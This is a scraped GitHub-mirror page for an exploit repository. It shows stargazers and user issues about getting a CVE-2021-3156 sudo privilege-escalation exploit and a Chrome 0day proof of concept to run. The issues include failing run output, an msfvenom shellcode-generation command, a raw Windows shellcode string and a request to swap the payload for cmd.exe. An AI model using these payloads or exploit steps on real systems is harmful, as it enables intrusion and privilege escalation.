r4j0x00 / exploits Goto Github PK

View Code? Open in Web Editor NEW

2.5K 2.5K 695.0 3.04 MB

License: BSD 2-Clause "Simplified" License

HTML 0.29% JavaScript 42.11% C 57.33% Makefile 0.26%

exploits's People

Contributors

Stargazers

Watchers

Forkers

exhades freeide zu1kbackup atorninja eternalsakura evildonkey420 msf-ntdll lovesuae killvxk fengjixuchui kentzhu acucea y11en phenomite hello-xbugs kotorinxn uuuunotfound m4yfly s3rgeym secure-nm 26alino servomekanism ak4l3r3 wbglil crackercat exporx ze0r rhpco kbarrett975 eggfly oksbsb santaklouse raystyle zavke cutff gdraperi jerryrig123 hackdou slowmistio 5l1v3r1 m4rm0k fdlucifer gavz s3m73x ev0x zounathan reverse-ex bejo6 chameleon318 cowbe0x004 tb205gti diegslva harry1080 h1d3r asll666 bluelongs askylyz drfalken69 flaviupopescu mattoattacko darkfunct filipesam elias403 hazarky ret2basic loligoshujinsama hhhhelix pxyloads remylegrand grejh0t bigbeno weisk grabber josh3012 anna12312 elijah-barker konano c0de3 titounkle sung3r technophobe01 andrewlester developer191 ch3rn0byl geekwish salememd witchfindertr auooo chivo912 dothanthitiendiettiende dark-lbp nevss cor3sm4sh3r wzor 957204459 xtiankisutsa brewsecurity yanshu911 asfduibkjewr mongsuk007

exploits's Issues

Doesnt work on LinuxLite

The one shot exploit doesnt work on

Linux lite

sudoedit: QXKVvwCKFbQgszpjZpDJduUXZLfVpeRG4094 is owned by uid 1000, should be 0
sudoedit: no password was provided
sudoedit: QXKVvwCKFbQgszpjZpDJduUXZLfVpeRG4095 is owned by uid 1000, should be 0
sudoedit: no password was provided
Failed

VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Linux Lite 5.2"
VERSION_ID="20.04"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

Running Sudo version 1.8.31

and it created all of these folder on the desktop too.

chrome exploits not working

Chrome gives the following.
Error code: STATUS_ACCESS_VIOLATION

Version 85.0.4183.83 (Official Build) (64-bit)

chrome-0day Shellcode

I'm trying to replace in POC calc.exe with cmd.exe. I'm generating shellcode using msf:
msfvenom -p windows/x64/exec CMD = 'cmd.exe'
Then convert shellcode with convert_shellcode.js but when I execute the exploit.html, it's not work. How exactly do i need to generate shellcode for cmd.exe?

thanks.

Unable to duplicate CVE-2021-3156 on 20.04

I am getting free(): invalid pointer Aborted (core dumped) error . Can you help me what is the problem. My ubuntu and sudo versions is same as you (20.04.1 LTS)

It doesnt't work at debian buster

sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ make
gcc exploit.c -o exploit
exploit.c: In function ‘main’:
exploit.c:75:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
     execve(argv[0], argv, env);
     ^~~~~~
mkdir libnss_X
gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ ./exploit
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$ uname -a
Linux debian-buster.*** 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
sergey@debian-buster:/tmp/exploits/CVE-2021-3156_one_shot$

Can't make Sudo exploit working on Ubuntu 18.04, Sudo 1.8.21p2

Hello,

I'm trying to execute the CVE-2021-3156 exploit and can't succed to it.

I'm getting a lot of "sudoedit: [...] : editing files in a writable directory is not permitted"

Have you any clue why it's not working here ?

Thanks

is this a race condition exploit?

why is the for loop exactly 1000, does it just have to be >a lot< (maybe depending on how beefy the system it's running on is)?

replace shellcode not success

I use msf create shellcode shellcode=\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00
then convert shellcode with convert_shellcode.js and replace the shellcode in exploit.js
Uint32Array(49) =[8579324, 2304770048, 1690317285, 2335199371, 1384844370, 678595348, 642430735, 1017970481, 738360417, 231719200, 4074948353, 1384863570, 1011518224, 2014399627, 3506522339, 542739281, 1233900289, 1228595992, 25900171, 2902405590, 17682369, 1977628871, 4168942582, 1965325627, 1485527268, 1725104420, 2336951435, 3540065368, 25887883, 608471504, 1633377060, 4283521625, 1516199904, 2380993163, 2365680221, 45701, 828919808, 4287065995, 3052452821, 2791855778, 4288527765, 2080783573, 3774578698, 1203438965, 1785688595, 3590279936, 1668047203, 1702389038, 2425393152]
but when I execute the exploit.html in chrome, it's not successfull

r4j0x00 / exploits Goto Github PK

exploits's People

Contributors

Stargazers

Watchers

Forkers

exploits's Issues

Doesnt work on LinuxLite

chrome exploits not working

chrome-0day Shellcode

Unable to duplicate CVE-2021-3156 on 20.04

I am getting free(): invalid pointer Aborted (core dumped) error . Can you help me what is the problem. My ubuntu and sudo versions is same as you (20.04.1 LTS)

It doesnt't work at debian buster

Can't make Sudo exploit working on Ubuntu 18.04, Sudo 1.8.21p2

is this a race condition exploit?

replace shellcode not success

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent